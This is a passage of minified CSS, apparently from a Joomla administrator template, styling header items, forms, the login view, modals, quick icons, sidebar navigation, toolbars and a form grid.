4px}.header-item-content{display:flex;align-items:center;line-height:1rem;color:#fff;background-color:var(--template-bg-dark-60);border-radius:22px;-webkit-padding-end:4px;padding-inline-end:4px}.header-item-content a,.header-item-content button{color:#fff;text-decoration:none}.header-item-content a{display:flex}.header-item-content:not(.no-link):not(.joomlaversion):hover{background-color:var(--template-bg-dark-50)}.header-item-content.joomlaversion{color:var(--bluegray);background-color:transparent}.header-item-content.joomlaversion .header-item-text{-webkit-padding-end:12px;padding-inline-end:12px}.header-item-icon>*{display:flex;align-items:center;justify-content:center;width:28px;min-width:28px;height:28px;margin:4px;color:#fff;background-color:var(--template-bg-dark);border-radius:16px}.header-item-icon span{margin:4px}.header-item-count{-webkit-margin-end:.5rem;margin-inline-end:.5rem}.header-item-text{padding:0 8px 0 4px;font-size:.75rem;white-space:nowrap}.header-more-btn{margin:0 5px;font-size:1.7rem}.header-dd-items .header-item-content{background:transparent}.header-dd-items .header-item-text{font-size:.75rem}.header-dd-items .dropdown-item{padding:.5rem .75rem}.header-dd-item{padding:3px 6px}@media (max-width:767.98px){.header-items{position:fixed;bottom:0;flex-direction:row-reverse;width:100%;padding:10px 0;margin:0;background:var(--template-bg-dark)}.header-items .fa-angle-down,.header-items .icon-angle-down{-webkit-transform:rotate(180deg);transform:rotate(180deg)}.header-item-more.active .header-more-menu{left:0}[dir=rtl] .header-item-more.active .header-more-menu{right:0;left:auto}.header-item-more .header-item-content{background:transparent}.header-more-menu{top:auto;bottom:100%}}.form-control{max-width:100%;background-color:#fff;border:1px solid var(--template-bg-dark-20);border-radius:.25rem}.form-control:focus{border-color:#39f;box-shadow:0 0 0 .2rem #eaeaea}.control-group{position:relative;display:flex;flex-wrap:wrap;margin:0 0 1rem}.control-group>.form-check{display:inline-block}.control-group:after{display:table;clear:both;content:""}.control-group .control-label{width:240px;padding:.3rem 1rem .3rem 0}.control-group .controls{position:relative;flex:1;min-width:210px}.control-group .controls+div{width:100%;margin:5px 0 10px}.form-vertical .control-group{flex-direction:column}.spacer hr{width:380px}.spacer label{width:440px}td .form-control{display:inline-block;width:auto}.checkboxes{padding-top:5px}.checkboxes .checkbox input{position:static;margin-left:0}.form-check{padding-top:5px;margin-bottom:0}.modal label{width:100%}.invalid{color:var(--danger);border-color:var(--danger)}.valid{border-color:var(--success)}.form-control-feedback{display:block}[aria-grabbed=true]{box-shadow:inset 0 0 0 .1rem #e9e9e9}.sortable-handler.inactive{opacity:.3}[role=tooltip]:not(.show){z-index:1070;display:none;padding:.5em;margin:.25em;color:#fff;text-align:start;background:#000;border-radius:.2rem!important}:focus+[role=tooltip],:hover+[role=tooltip]{position:absolute;display:block}[id="filter[search]-desc"]{bottom:100%}.container-popup [id="filter[search]-desc"]{top:100%;bottom:auto}.input-group>.form-control[readonly]{margin-right:1px}div.subform-repeatable-group{position:relative;padding:32px 32px 16px 28px;margin-top:20px;border:1px solid var(--template-bg-dark-20);border-radius:.25rem}div.subform-repeatable-group>.btn-toolbar .btn-group{position:static}div.subform-repeatable-group>.btn-toolbar .btn{position:absolute}div.subform-repeatable-group>.btn-toolbar .btn.group-add{right:-1px;bottom:-1px;border-radius:.25rem 0 .25rem 0}div.subform-repeatable-group>.btn-toolbar .btn.group-remove{top:-1px;right:-1px;border-radius:0 .25rem 0 .25rem}div.subform-repeatable-group>.btn-toolbar .btn.group-move{top:50%;right:100%;margin-top:-27px;line-height:52px;border-radius:.25rem 0 0 .25rem}.subform-repeatable-group[draggable=true],.subform-repeatable-group[draggable=true]>td{background-color:#20c997}.icon-white{color:#fff}.tbody-icon{padding:0 3px;text-align:center;background-color:transparent;border:0}.tbody-icon [class*=" fa-"],.tbody-icon [class*=" icon-"],.tbody-icon [class^=fa-],.tbody-icon [class^=icon-]{width:26px;height:26px;font-size:1rem;line-height:22px;color:#cdcdcd;border:2px solid var(--border);border-radius:50%}.tbody-icon .fa-check,.tbody-icon .icon-check,.tbody-icon .icon-publish{color:var(--success);border-color:var(--success)}.tbody-icon .fa-star.featured,.tbody-icon .icon-color-featured,.tbody-icon .icon-home,.tbody-icon .icon-star.featured{color:#ffb514;border-color:#ffb514}.tbody-icon .fa-folder,.tbody-icon .icon-archive,.tbody-icon .icon-folder{color:var(--template-text-dark);border-color:#495057}.tbody-icon .fa-lock,.tbody-icon .icon-checkedout,.tbody-icon .icon-lock{width:auto;height:auto;font-size:1.2rem;line-height:1rem;color:var(--template-text-dark);border:0}.tbody-icon.color-featured-disabled,.tbody-icon.fa-star-disabled,.tbody-icon.featured-disabled,.tbody-icon.home-disabled,.tbody-icon.icon-star-disabled{cursor:not-allowed;opacity:1}.tbody-icon.disabled .fa-home,.tbody-icon.disabled .icon-home{color:#fffcf4;border-color:#fffcf4}.plg_system_webauthn_login_button svg{-webkit-margin-end:2px;margin-inline-end:2px}.plg_system_webauthn_login_button svg path{fill:var(--white)}.badge>span{-webkit-margin-end:.5rem;margin-inline-end:.5rem}iframe{border:0}.modal iframe{width:100%}.options-form{width:100%;padding:1vw 2vw;margin-bottom:1rem;color:var(--template-text-dark);border:1px solid var(--template-bg-dark-20)}.options-form>legend{float:none;width:auto;padding:0 1rem;font-weight:700;color:var(--template-text-dark);background-color:#fff}.task-logout .container-main,.view-login .container-main{order:1}@media (max-width:767.98px){.task-logout .container-main,.view-login .container-main{display:flex;flex-wrap:wrap;align-items:center;justify-content:center;min-height:65vh}}@media (max-width:767.98px){.task-logout .container-main #content,.view-login .container-main #content{max-width:98%;padding:0}}.task-logout .login,.view-login .login{width:100%;max-width:25rem;padding:30px;margin:1rem;color:var(--template-text-dark);background:var(--white);border-radius:10px;box-shadow:0 4px 20px -10px var(--template-bg-dark-50)}@media (max-width:991.98px){.task-logout .login,.view-login .login{margin-bottom:3rem}}.task-logout .login img,.view-login .login img{max-height:4.4rem}.task-logout .login .logo,.view-login .login .logo{padding:0 20px 20px}.task-logout .login svg.joomla-logo,.view-login .login svg.joomla-logo{width:2.4rem;height:4.4rem;background-size:4.4rem 2.4rem}.task-logout .login svg.joomla-logo path,.view-login .login svg.joomla-logo path{fill:var(--template-bg-dark)}.task-logout .login-watermark,.view-login .login-watermark{position:absolute;z-index:-1;max-width:500px;-webkit-transform:rotate(12deg) translate(40%,10%);transform:rotate(12deg) translate(40%,10%)}.task-logout .form-group,.view-login .form-group{position:relative;margin-bottom:1.85rem}.task-logout .form-group label span,.view-login .form-group label span{font-size:.9rem}@media (max-width:575.98px){.task-logout .form-group label span,.view-login .form-group label span{width:100%}}.task-logout .form-group label span.text-end,.view-login .form-group label span.text-end{font-size:.75rem;color:var(--template-special-color)}.task-logout .form-group .form-control-feedback,.view-login .form-group .form-control-feedback{position:absolute;right:0;bottom:-1.5rem;font-size:.75rem;text-align:right}[dir=rtl] .task-logout .form-group .form-control-feedback,[dir=rtl] .view-login .form-group .form-control-feedback{right:auto;left:0;text-align:left}.task-logout .form-group .form-control-hint,.view-login .form-group .form-control-hint{position:absolute;top:.1rem;right:0;font-size:.75rem;text-align:right}[dir=rtl] .task-logout .form-group .form-control-hint,[dir=rtl] .view-login .form-group .form-control-hint{right:auto;left:0;text-align:left}.task-logout input:focus,.task-logout select:focus,.view-login input:focus,.view-login select:focus{background:#fff;box-shadow:inset 0 0 1px 1px var(--template-contrast)}.task-logout .h1,.task-logout h1,.view-login .h1,.view-login h1{margin-bottom:.25rem;color:#fff;text-align:center}.task-logout .h2,.task-logout h2,.view-login .h2,.view-login h2{font-weight:400;color:var(--template-bg-dark-10)}@media (max-width:575.98px){.task-logout .btn,.view-login .btn{padding:8px 10px;font-size:.875rem}}.task-logout .custom-select,.task-logout .form-control,.task-logout .form-select,.view-login .custom-select,.view-login .form-control,.view-login .form-select{max-width:none}.task-logout .header .logo,.task-logout .sidebar-wrapper,.view-login .header .logo,.view-login .sidebar-wrapper{flex:1 0 400px}.task-logout .sidebar-wrapper,.view-login .sidebar-wrapper{display:flex;flex-direction:column;max-width:none;background-color:var(--template-sidebar-bg)}@media (max-width:767.98px){.task-logout .sidebar-wrapper,.view-login .sidebar-wrapper{order:2;margin-bottom:3rem}}.task-logout .sidebar-wrapper .main-brand,.view-login .sidebar-wrapper .main-brand{margin-bottom:auto}.task-logout .sidebar-wrapper .main-brand a,.view-login .sidebar-wrapper .main-brand a{font-size:.875rem}.task-logout .sidebar-wrapper .card-header,.view-login .sidebar-wrapper .card-header{font-size:1.125rem;color:#fff}.task-logout #sidebar,.view-login #sidebar{align-self:flex-end;width:100%;font-size:.875rem;color:var(--template-text-light);text-align:center}.task-logout #sidebar .card,.view-login #sidebar .card{background:rgba(0,0,0,.1);box-shadow:none}.task-logout #sidebar .card .module-body,.view-login #sidebar .card .module-body{padding:.75rem 1.25rem}@media (max-width:767.98px){.task-logout #sidebar,.view-login #sidebar{position:relative;bottom:0}}@media (max-width:767.98px){.task-logout .container-main,.task-logout .sidebar-wrapper,.view-login .container-main,.view-login .sidebar-wrapper{flex:1 0 100%!important;max-width:100%!important;min-height:auto}}.task-logout .wrapper,.view-login .wrapper{display:flex}@media (max-width:767.98px){.task-logout .wrapper,.view-login .wrapper{flex-direction:column}}.task-logout .header,.view-login .header{display:flex}.task-logout .header .logo.small,.view-login .header .logo.small{line-height:2.5rem}@media (max-width:767.98px){.task-logout .header,.view-login .header{background:var(--template-bg-dark-70)}}label{color:#132f53}.com_login .sidebar-wrapper .main-brand{flex:1;flex-basis:auto;margin-top:100px;text-align:center}@media (max-width:767.98px){.com_login .sidebar-wrapper .main-brand{margin-top:10px}}.com_login .sidebar-wrapper #sidebar p{margin-bottom:.2rem}.com_login .sidebar-wrapper #sidebar,.com_login .sidebar-wrapper #sidebar a,.com_login .sidebar-wrapper .main-brand a{color:var(--template-text-light)}@media (max-width:767.98px){.view-login #wrapper.d-flex{display:flex!important}}@media (max-width:767.98px){.view-login #sidebar-wrapper:not(.show):not(.collapse){display:block}}.view-login .invalid .form-control-feedback{color:var(--danger)}.ie11{display:none}@media (-ms-high-contrast:active),(-ms-high-contrast:none){.ie11{display:block}}.login_message{margin:1rem 1rem 0}.modal .btn{padding:0 22px;-webkit-margin-end:.5rem;margin-inline-end:.5rem;font-size:1rem;line-height:2.3rem;color:var(--template-text-dark);background:var(--white);border-color:var(--whiteoffset);box-shadow:1px 1px 1px 0 rgba(0,0,0,.25)}.modal .btn-danger:not([href]),.modal .btn-primary:not([href]),.modal .btn-secondary:not([href]),.modal .btn-success:not([href]){color:var(--template-text-dark);background:var(--white);border:1px solid var(--template-text-dark)}.modal .btn-primary:not([href]):hover{color:var(--white);background:var(--primary);border-color:var(--primary)}.modal .btn-secondary:not([href]):hover{color:var(--white);background:var(--secondary);border-color:var(--secondary)}.modal .btn-success:not([href]):hover{color:var(--white);background:var(--success);border-color:var(--success)}.modal .btn-danger:not([href]):hover{color:var(--white);background:var(--danger);border-color:var(--danger)}.modal .btn.btn-danger [class*=" fa-"],.modal .btn.btn-danger [class*=" icon-"],.modal .btn.btn-danger [class^=fa-],.modal .btn.btn-danger [class^=icon-],.modal .btn.btn-danger span{display:inline-block;width:2.375rem;height:100%;margin:0 16px;-webkit-margin-start:-22px;margin-inline-start:-22px;line-height:2.375rem;color:hsla(0,0%,100%,.9);background-color:var(--danger)}.modal .btn.btn-success [class*=" fa-"],.modal .btn.btn-success [class*=" icon-"],.modal .btn.btn-success [class^=fa-],.modal .btn.btn-success [class^=icon-],.modal .btn.btn-success span{display:inline-block;width:2.375rem;height:100%;margin:0 16px;-webkit-margin-start:-22px;margin-inline-start:-22px;line-height:2.375rem;color:hsla(0,0%,100%,.9);background-color:var(--success)}.modal-header{padding:0 15px}.modal-body{overflow-y:initial}.modal-title{font-weight:400;line-height:2.875rem}.contentpane{padding:20px}.changelog{text-align:start!important}.changelog__item{display:flex;border-bottom:1px solid #dee2e6}@media (max-width:767.98px){.changelog__item{flex-direction:column}}.changelog__tag{flex:1 0 180px;max-width:180px;padding:10px 15px;text-align:end;background:#f1f3f5;border-right:1px solid #dee2e6}.changelog__tag .badge{border-radius:.2rem}.changelog__tag .badge.badge-jlanguage{background-color:#fff}@media (max-width:767.98px){.changelog__tag{flex:1 0 auto;max-width:100%;text-align:left;border-right:0;border-bottom:1px solid #dee2e6}}.changelog__list{padding:10px 15px}.changelog__list ul{-webkit-padding-start:15px;padding-inline-start:15px;margin-bottom:0}.changelog__list li{margin-bottom:.15rem}.changelog__list li:last-of-type{margin-bottom:0}.quick-icons{background-color:#fff}.quick-icons .nav{display:grid;grid-template-columns:repeat(auto-fit,minmax(190px,1fr));grid-gap:1rem}.quick-icons a{text-decoration:none}.quick-icons ul{padding:0}.quick-icons .quickicon{--text-color:hsl(var(--hue),30%,40%);--bg-color:hsl(var(--hue),60%,97%);--icon-color:hsl(var(--hue),30%,40%);--bg-color-hvr:var(--template-bg-dark);display:flex;flex-grow:1}.quick-icons .quickicon a{display:flex;flex-direction:column;flex-grow:1;justify-content:flex-end;padding:0 1rem;color:var(--text-color);background-color:var(--bg-color);transition:all .25s ease}.quick-icons .quickicon a .quickicon-icon{margin-top:.5rem;-webkit-margin-start:.2rem;margin-inline-start:.2rem}.quick-icons .quickicon a .quickicon-icon>*{font-size:2rem;color:var(--icon-color)}.quick-icons .quickicon a .quickicon-name{padding:.125rem 0 .6rem;font-size:.875rem;font-weight:700}.quick-icons .quickicon a .quickicon-amount{padding:.25rem .5rem;font-weight:700;line-height:1rem;background:hsl(var(--hue),50%,93%);border-radius:.25rem;transition:all .25s ease;-webkit-margin-start:.5rem;margin-inline-start:.5rem}.quick-icons .quickicon a .j-links-link{display:block;padding:0 .2rem;line-height:1.1}.quick-icons .quickicon a:active,.quick-icons .quickicon a:focus,.quick-icons .quickicon a:hover{color:#fff;text-decoration:none;background:var(--bg-color-hvr)}.quick-icons .quickicon a:active .quickicon-amount,.quick-icons .quickicon a:focus .quickicon-amount,.quick-icons .quickicon a:hover .quickicon-amount{background:var(--icon-color)}.quick-icons .quickicon a.danger,.quick-icons .quickicon a.warning{--text-color:var(--danger);--bg-color:#f4f0f0;--icon-color:#ce8484;--bg-color-hvr:var(--danger)}.quick-icons .quickicon a.success{--text-color:var(--success);--bg-color:#f3f9f3;--icon-color:#55a258;--bg-color-hvr:var(--success)}.quick-icons .quickicon-info{display:flex;align-items:flex-end}.quick-icons .quickicon-linkadd{width:2.5rem;font-size:1.2rem;background:hsl(var(--hue),50%,93%);transition:all .25s ease}.quick-icons .quickicon-linkadd a{align-items:flex-end;justify-content:center;width:100%}.quick-icons .quickicon-linkadd a>*{margin-bottom:10px;color:hsl(var(--hue),30%,40%)}.quick-icons .quickicon-linkadd a:active,.quick-icons .quickicon-linkadd a:focus,.quick-icons .quickicon-linkadd a:hover{background:var(--template-bg-dark)}.quick-icons .quickicon-linkadd a:active *,.quick-icons .quickicon-linkadd a:focus *,.quick-icons .quickicon-linkadd a:hover *{color:#fff}.quick-icons .quickicon-group,.quick-icons .quickicon-single{display:flex;min-height:6rem;overflow:hidden;border:1px solid hsl(var(--hue),50%,93%);border-radius:4px}#content .menu-quicktask{position:absolute}[dir=ltr] #content .menu-quicktask{right:1.25rem}[dir=rtl] #content .menu-quicktask{left:1.25rem}#content form .name.break-word{word-break:break-word}.sidebar-wrapper{z-index:1010;min-height:calc(100vh - 66px);overflow:hidden;background-color:var(--template-sidebar-bg);box-shadow:0 0 20px -10px var(--template-bg-dark-50)}.sidebar-wrapper .sidebar-sticky{position:sticky;top:0}.sidebar-wrapper .item{position:relative;display:flex;flex-wrap:wrap;list-style-type:none}.sidebar-wrapper .item .menu-dashboard,.sidebar-wrapper .item .menu-quicktask,.sidebar-wrapper .item a{color:#fff;text-decoration:none}.sidebar-wrapper .item .menu-dashboard:hover,.sidebar-wrapper .item .menu-quicktask:hover,.sidebar-wrapper .item a:hover{color:var(--template-text-light);text-decoration:none;background-color:var(--template-bg-dark-65)}.sidebar-wrapper .item>a{position:relative;display:flex;flex-grow:1;align-items:center;min-height:40px}.sidebar-wrapper .item>a [class*=" fa-"],.sidebar-wrapper .item>a [class*=" icon-"],.sidebar-wrapper .item>a [class^=fa-],.sidebar-wrapper .item>a [class^=icon-]{margin:0 .85rem;-webkit-transform:scale(1.2);transform:scale(1.2)}.sidebar-wrapper .item-level-2>a{-webkit-padding-start:3rem;padding-inline-start:3rem}.sidebar-wrapper .item-level-3>a{-webkit-padding-start:3.75rem;padding-inline-start:3.75rem}@media (min-width:576px){.sidebar-wrapper{flex:1 0 18rem;max-width:18rem;transition:all .3s ease-in-out}}@media (max-width:575.98px){.sidebar-wrapper.sidebar-menu{top:auto}}.sidebar-wrapper .sidebar-toggle{background:var(--template-bg-dark-60)}.sidebar-wrapper .sidebar-toggle a{color:#fff}.sidebar-wrapper .sidebar-toggle .sidebar-item-title{white-space:nowrap}.main-nav{width:18rem;padding:0;font-size:.95rem}@media (max-width:575.98px){.main-nav{width:100%}}.main-nav li .menu-dashboard>a,.main-nav li .menu-quicktask>a{display:inline-flex;align-items:center;justify-content:center;width:40px;height:100%}.main-nav ul{width:100%;padding:0;background-color:var(--template-bg-dark-75)}.main-nav .divider{height:1px;margin:0 0 0 48px;list-style:none;background-color:var(--template-bg-dark-60)}.main-nav .menuitem-group{margin-top:.65rem;font-size:.75rem;-webkit-padding-start:3rem;padding-inline-start:3rem}.main-nav .menuitem-group .sidebar-item-title{color:var(--template-bg-dark-30)}.main-nav .has-arrow .sidebar-item-title{-webkit-margin-end:auto;margin-inline-end:auto}.main-nav .has-arrow:after{display:flex;align-items:center;justify-content:center;width:2rem;font-family:Font Awesome\ 5 Free;font-weight:900}[dir=ltr] .main-nav .has-arrow:after{content:""}[dir=rtl] .main-nav .has-arrow:after{content:""}.main-nav a.mm-active{background-color:var(--template-bg-dark-70)}.main-nav a.mm-active+.menu-quicktask{background-color:var(--template-bg-dark-60)}.main-nav .mm-active>.has-arrow:after{content:""}.main-nav .mm-collapse{display:none}.main-nav .mm-collapse.mm-collapsed,.main-nav .mm-collapse.mm-show{display:block}.main-nav .mm-collapsing{position:relative;height:0;overflow:hidden;transition:all .35s ease}.main-nav .badge{align-self:center;margin:0 .3rem .25rem;background-color:var(--template-bg-dark-60)}.closed .sidebar-wrapper{flex:1 0 3rem;max-width:3rem;overflow:visible}.closed .has-arrow:after,.closed .menu-dashboard,.closed .sidebar-item-title{display:none}.closed .main-nav,.closed .main-nav li{max-width:3rem}.closed .main-nav a:hover{position:relative;max-width:3rem}.closed .main-nav a:hover .sidebar-item-title{position:absolute;left:100%;display:flex;align-items:center;height:100%;padding:0 1rem;white-space:nowrap;pointer-events:none;background-color:var(--template-bg-dark-60);border-radius:0 .25rem .25rem 0}[dir=rtl] .closed .main-nav a:hover .sidebar-item-title{right:100%;left:unset;border-radius:.25rem 0 0 .25rem}.closed .main-nav>li>ul{height:0;padding:0;visibility:hidden}@media (min-width:576px){.toggler-burger{display:none}}@media (max-width:575.98px){#menu-collapse{display:none;background:var(--template-bg-dark-50)}.toggler-burger{position:fixed;right:0;bottom:0;z-index:9999;padding:10px 15px}[dir=rtl] .toggler-burger{right:auto;left:0}.toggler-burger:focus{box-shadow:none}.toggler-burger .navbar-toggler-icon:before{display:inline-block;font:normal normal 900 28px/1 Font Awesome\ 5 Free;color:var(--toggle-color);content:""}.toggler-burger.collapsed .navbar-toggler-icon:before{content:""}.sidebar-menu{display:none}.sidebar-menu.collapsing,.sidebar-menu.show{position:fixed;bottom:55px;z-index:9000;display:block;width:100%;min-height:auto;max-height:calc(100vh - 72px);overflow-y:auto}}.sidebar-nav{padding:1rem 2rem}.sidebar-nav li{font-size:.9rem;font-weight:700}.sidebar-nav li.divider{margin:.3rem 0}.sidebar-nav li a{display:block;padding:.25rem;font-weight:400;color:var(--template-text-dark);text-decoration:none}.sidebar-nav li a:before{margin-right:.5rem;font-family:Font Awesome\ 5 Free;font-weight:900;content:""}[dir=rtl] .sidebar-nav li a:before{margin-right:0;content:none}[dir=rtl] .sidebar-nav li a:after{-webkit-margin-end:.5rem;margin-inline-end:.5rem;font-family:Font Awesome\ 5 Free;font-weight:900;content:""}.sidebar-nav li.active,.sidebar-nav li.item:hover{background-color:var(--template-bg-dark-60)}.sidebar-nav li.active a,.sidebar-nav li.item:hover a{color:var(--template-text-light)}.switcher .toggle-outside{border:1px solid var(--template-bg-dark-20);border-radius:.25rem}.switcher .toggle-outside:focus{box-shadow:inset 0 0 0 .1rem #e9e9e9}.switcher input:focus~.toggle-outside{border-color:#39f;box-shadow:0 0 0 .2rem #eaeaea}.disabled{opacity:.4}.subhead{position:sticky;top:0;right:0;left:0;z-index:1000;width:auto;min-height:43px;padding:8px 1rem;color:var(--template-text-dark);background:#fff;background-image:linear-gradient(var(--toolbar-bg),var(--template-bg-dark-3));box-shadow:0 2px 10px -8px var(--template-bg-dark-50)}.subhead .row{margin-right:0;margin-left:0}.subhead.noshadow{box-shadow:none}.subhead .btn-group,.subhead joomla-toolbar-button{-webkit-margin-start:.75rem;margin-inline-start:.75rem}.subhead .btn-group:first-child,.subhead joomla-toolbar-button:first-child{-webkit-margin-start:0;margin-inline-start:0}.subhead joomla-toolbar-button .btn>span,.subhead joomla-toolbar-button .dropdown-item>span{-webkit-margin-end:.5rem;margin-inline-end:.5rem;width:1.25em;text-align:center}.subhead .btn{--subhead-btn-accent:var(--template-text-dark);padding:0 1rem;margin:5px 0;font-size:1rem;line-height:2.45rem;color:var(--template-text-dark);background:#fff;border-color:hsl(var(--hue),20%,80%)}.subhead .btn>span{display:inline-block;color:var(--subhead-btn-accent)}.subhead .btn:not([disabled]):active,.subhead .btn:not([disabled]):focus,.subhead .btn:not([disabled]):hover{color:hsla(0,0%,100%,.9);background-color:var(--subhead-btn-accent);border-color:var(--subhead-btn-accent)}.subhead .btn:not([disabled]):active>span,.subhead .btn:not([disabled]):focus>span,.subhead .btn:not([disabled]):hover>span{color:hsla(0,0%,100%,.9)}.subhead .btn.btn-success{--subhead-btn-accent:var(--success)}.subhead .btn.btn-danger{--subhead-btn-accent:var(--danger)}.subhead .btn.btn-primary{--subhead-btn-accent:var(--template-link-color)}.subhead .btn.btn-secondary{--subhead-btn-accent:var(--template-special-color)}.subhead .btn.btn-action,.subhead .btn.btn-info{--subhead-btn-accent:var(--template-bg-dark)}.subhead .btn.btn-action{display:flex;align-items:center}.subhead .btn.btn-action:after{width:2.375rem;font-family:Font Awesome\ 5 Free;font-weight:900;content:"";border:0}.subhead .btn.dropdown-toggle[disabled],.subhead .btn[disabled]{--subhead-btn-accent:var(--template-bg-dark);background:rgba(222,226,230,.8);opacity:.5}.subhead .btn.dropdown-toggle[disabled]:active,.subhead .btn.dropdown-toggle[disabled]:focus,.subhead .btn.dropdown-toggle[disabled]:hover,.subhead .btn[disabled]:active,.subhead .btn[disabled]:focus,.subhead .btn[disabled]:hover{cursor:not-allowed}.subhead .dropdown-toggle.btn{-webkit-padding-end:0;padding-inline-end:0}.subhead .btn-group:not(:last-child)>.dropdown-toggle-split{order:1;-webkit-margin-start:-.25rem;margin-inline-start:-.25rem}[dir=ltr] .subhead .btn-group:not(:last-child)>.dropdown-toggle-split{border-radius:0 .25rem .25rem 0}[dir=rtl] .subhead .btn-group:not(:last-child)>.dropdown-toggle-split{border-radius:.25rem 0 0 .25rem}.subhead .btn-group joomla-toolbar-button,.subhead .dropdown-menu joomla-toolbar-button{-webkit-margin-start:0;margin-inline-start:0}.contentpane .subhead{margin:-15px -15px 0;background-image:none;border-bottom:1px solid var(--template-bg-dark-7)}@media (max-width:575.98px){joomla-tab[view=accordion] .col-md-3,joomla-tab[view=accordion] .col-md-9{padding:.5rem 1rem!important}#myTab{margin-top:1rem;margin-bottom:1.5rem}joomla-tab[view=accordion] ul li{width:100%}.toggler-toolbar{top:0;bottom:auto;z-index:1030;padding:7px 10px;margin:5px;background-color:var(--template-bg-dark);border-radius:30px}.toggler-toolbar .toggler-toolbar-icon:before{font:normal normal 900 28px/1 Font Awesome\ 5 Free;color:var(--toggle-color);content:""}.toggler-toolbar.collapsed .toggler-toolbar-icon:before{content:""}.subhead{padding-right:0;padding-left:0}.subhead .btn,.subhead .btn-group,.subhead joomla-toolbar-button{width:100%;margin-left:0;text-align:left}.subhead .btn-toolbar>.btn-group,.subhead .btn-toolbar>joomla-toolbar-button{margin-left:0}.subhead .btn.btn-action:after{text-align:center;-webkit-margin-start:auto;margin-inline-start:auto}.subhead .dropdown-toggle-split{width:auto}}.treeselect{display:block;padding-left:0;list-style:none}.treeselect .nav-header{font-weight:700;color:#212529}.treeselect li{position:relative;display:block;line-height:2.2rem;list-style:none}.treeselect li:before{position:absolute;top:14px;left:25px;width:10px;height:1px;margin:auto;content:"";background-color:rgba(0,0,0,.2)}[dir=rtl] .treeselect li:before{right:25px;left:0;margin:0}.treeselect li:after{position:absolute;top:0;bottom:0;left:25px;width:1px;height:100%;content:"";background-color:rgba(0,0,0,.2)}[dir=rtl] .treeselect li:after{right:25px;left:0}.treeselect li:last-child:after{height:14px}.treeselect li li{-webkit-padding-start:40px;padding-inline-start:40px}.treeselect .fa-,.treeselect .icon-,.treeselect>li:after,.treeselect>li:before{display:none}.treeselect .treeselect-toggle{display:inline-block;padding:0;margin-right:.1rem;text-align:center;cursor:pointer}.treeselect .treeselect-item,.treeselect .treeselect-menu{display:inline-block}.treeselect .treeselect-item input{position:relative;top:1px;margin-right:.2rem}.treeselect .treeselect-item label{margin-bottom:0}.treeselect .dropdown-toggle{padding:0 .5rem .3rem;margin-left:.5rem}.treeselect .dropdown-toggle:after{margin-left:0;font-size:1rem;color:var(--template-text-dark)}.treeselect-sub{padding-left:0}.tree-holder ul ul li:after,.tree-holder ul ul li:before{left:8px;display:block}[dir=rtl] .tree-holder ul ul li:after,[dir=rtl] .tree-holder ul ul li:before{right:8px;left:0;margin:0}.tree-holder ul ul li:before{top:12px}.tree-holder ul ul li:last-child:after{height:12px}.tree-holder li{line-height:1.8rem}.tree-holder li li{-webkit-padding-start:20px;padding-inline-start:20px}*{box-sizing:border-box}.element-invisible{position:absolute;width:1px;height:1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);white-space:nowrap;border:0;-webkit-clip-path:inset(50%);clip-path:inset(50%)}.hidden{display:none}.table-row{display:table-row}.form-grid{--span-1:span 1;--span-2:span 1;--span-3:span 1;--span-4:span 1;--span-5:span 1;display:grid;grid-template-columns:repeat(1,1fr);grid-gap:1rem}@media (min-width:576px){.form-grid{--span-2:span 2;--span-3:span 2;--span-4:span 2;--span-5:span 2;grid-template-columns:repeat(2,1fr)}}@media (min-width:768px){.form-grid{--span-3:span 3;--span-4:span 4;--span-5:span 4;grid-template-columns:repeat(4,1fr);grid-gap:1rem 2rem}}@media (min-width:992px){.form-grid{--span-5:span 5;grid-template-columns:repeat(6,1fr)}}.form-grid>*{grid-column:1/-1}.form-grid .stack{flex-direction:column}.form-grid .span-1{grid-column:1/var(--span-1)}.form-grid .span-1-inline{grid-column:var(--span-1)}.form-grid .span-2{grid-column:1/var(--span-2)}.form-grid .span-2-inline{grid-column:var(--span-2)}.form-grid .span-3{grid-column:1/var(--span-3)}.form-grid .span-3-inline{grid-column:var(--span-3)}.form-grid .span-4{grid-column:1/var(--span-4)}.form-grid .span-4-inline{grid-column:var(--span-4)}.form-grid .span-5{grid-column:1/var(--span-5)}.form-grid .span-5-inline{grid-column:var(--span-5)}@media (min-width:992px){.form-grid .offset-1{grid-column-start:2}.form-grid .offset-2{grid-column-start:3}.form-grid .offset-3{grid-column-start:4}.form-grid .offset-4{grid-column-start:5}.form-grid .offset-5{grid-column-start:6}}.w-1{width:1%}.w-3{width:3%}.w-5{width:5%}.w-6{width:6%}.w-7{width:7%}.w-10{width:10%}.w-12{width:12%}.w-15{width:15%}.w-20{width:20%}.w-30{width:30%}.w-35{width:35%}.w-40{width:40%}.w-60{width:60%}.w-80{width:80%}.editor-xtd-buttons .btn{margin-bottom:5px}.CodeMirror-fullscreen{top:63px}.gu-mirror{position:fixed!important;z-index:1060!important;display:table;margin:0!important;cursor:move;opacity:.8}.gu-mirror,.gu-mirror td,.gu-mirror th{background-color:#20c997}.js-draggable .sortable-handler{cursor:move}.editor .toggle-editor{margin-top:1rem}.editor .mce-tinymce{border:1px solid var(--template-bg-dark)}.editor .mce-btn,.editor .mce-panel{background:var(--white-offset)}.container-main .mce-panel{background:transparent;border:0;box-shadow:none}.container-main .mce-top-part{margin-bottom:1rem}.container-main .mce-top-part:before{box-shadow:none}.container-main .mce-menubar .mce-menubtn{background-color:#fff}.container-main .mce-flow-layout-item{margin:2px 8px 2px 0}.container-main .mce-btn-group:not(:first-child){margin-right:6px;margin-left:0}.container-main .mce-btn-group .mce-btn{margin:0 1px 0 0}.container-main .mce-statusbar .mce-container-body{background-color:#fff;border-top:1px solid var(--template-bg-light)}.com_config #fieldset-permissions{grid-template-columns:1fr}.com_config #page-filters .custom-select,.com_config #page-filters .form-select{width:auto}.com_config .tab-description{grid-column:1/-1}.com_config .options-menu .revert-controls .controls{-webkit-margin-start:0;margin-inline-start:0}.com_content.layout-edit joomla-field-media .field-media-preview{height:10.25rem}.com_content.layout-edit joomla-tab #attrib-basic[active],.com_content.layout-edit joomla-tab #editor[active]{display:flex;flex-wrap:wrap}.com_content.layout-edit joomla-tab #attrib-basic[active] .form-group,.com_content.layout-edit joomla-tab #editor[active] .form-group{flex:0 0 50%;max-width:50%;box-shadow:none}.com_content.layout-edit joomla-tab #attrib-basic[active] .field-spacer,.com_content.layout-edit joomla-tab #attrib-basic[active] .form-group:first-child,.com_content.layout-edit joomla-tab #attrib-basic[active] .form-group:nth-child(19),.com_content.layout-edit joomla-tab #editor[active] .field-spacer,.com_content.layout-edit joomla-tab #editor[active] .form-group:first-child,.com_content.layout-edit joomla-tab #editor[active] 